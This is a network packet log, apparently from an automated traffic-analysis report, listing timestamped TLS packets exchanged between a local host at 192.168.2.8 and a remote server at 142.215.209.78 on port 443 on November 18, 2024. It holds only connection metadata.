                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663839102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663850069 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663921118 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.663928986 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664839029 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664899111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664910078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664916992 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.664958954 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734512091 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734534979 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734636068 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.734675884 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781512022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781631947 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.781699896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782397032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782416105 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782474041 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782494068 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.782522917 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.783956051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.783979893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.784035921 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.784053087 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806333065 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806430101 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806453943 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806473017 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.806505919 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.850101948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879262924 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879278898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879307032 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879352093 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.879416943 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938570023 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938606024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938672066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938731909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938750982 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.939934969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940001965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940032959 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940057039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940080881 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941286087 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941370964 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941385984 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942120075 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942195892 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942210913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.990740061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044816971 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044831038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044913054 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044929981 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046011925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046021938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046087027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046093941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046850920 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046860933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046920061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046928883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048423052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048472881 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048484087 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048491001 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048515081 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049263954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049329996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049335003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.097059011 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165318012 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165334940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165437937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165488005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166610956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166623116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166687965 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166706085 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168174028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168185949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168246984 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168266058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168946981 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.169023991 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.169038057 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.169071913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.169105053 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.170435905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.170505047 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.170521975 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.225084066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235687971 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235722065 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235739946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235761881 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235795975 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.235805988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.284761906 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.284780979 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.284894943 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.284920931 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.285928965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.285940886 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.285972118 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.286019087 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.286027908 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.286040068 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287276983 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287288904 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287317038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287342072 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287353039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.287378073 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.288074017 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.288084030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.288146019 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.288153887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.289638042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.289705038 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.289710045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.289717913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.289756060 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.403143883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.403179884 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.403261900 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.403261900 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.403347969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.404038906 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.404114962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.404139996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.405255079 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.405400038 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.405421019 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.406232119 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.406318903 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.406335115 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.407140017 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.407216072 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.407232046 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.408060074 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.408145905 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.408159971 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.459491968 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.521935940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.521970034 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522030115 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522073984 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522092104 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522574902 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522658110 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522671938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522691965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.522733927 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.523137093 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.523217916 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.523231983 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.523983955 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.524074078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.524086952 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.524899960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.524987936 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.525002956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.567744970 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.567837954 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.567857981 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.594666004 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.594690084 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.594742060 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.594752073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.594788074 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.641444921 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.641469002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.641524076 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.641541004 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.641588926 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642678976 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642702103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642736912 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642750025 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642757893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.642786980 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.644229889 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.644249916 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.644298077 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.644304991 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.644331932 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645436049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645498991 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645502090 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645515919 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645559072 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645873070 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645893097 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645946026 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645951033 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.645998001 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.713906050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.714004040 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.714015007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.756330013 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.759780884 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.759792089 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.759855986 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.759865999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761132956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761181116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761208057 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761214972 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761240005 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762195110 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762259007 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762267113 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762782097 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762845039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762851954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764801025 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764861107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764869928 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765372038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765439034 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765446901 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.814213991 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832854033 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832886934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832941055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.833007097 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.833019018 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878848076 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878943920 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878951073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878959894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879005909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879455090 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879481077 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879514933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879523039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879544020 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879573107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880728006 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880831003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880866051 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880888939 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880893946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881119967 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881464958 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881545067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881550074 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882311106 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882390976 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882399082 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890010118 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890086889 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890093088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.943835974 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957906008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957947016 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957964897 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957999945 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.958060980 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.958070993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998282909 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998306990 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998356104 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998377085 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998393059 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999387026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999407053 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999424934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999442101 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999461889 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999481916 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000569105 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000587940 CET44349706142.215.209.78192.168.2.8
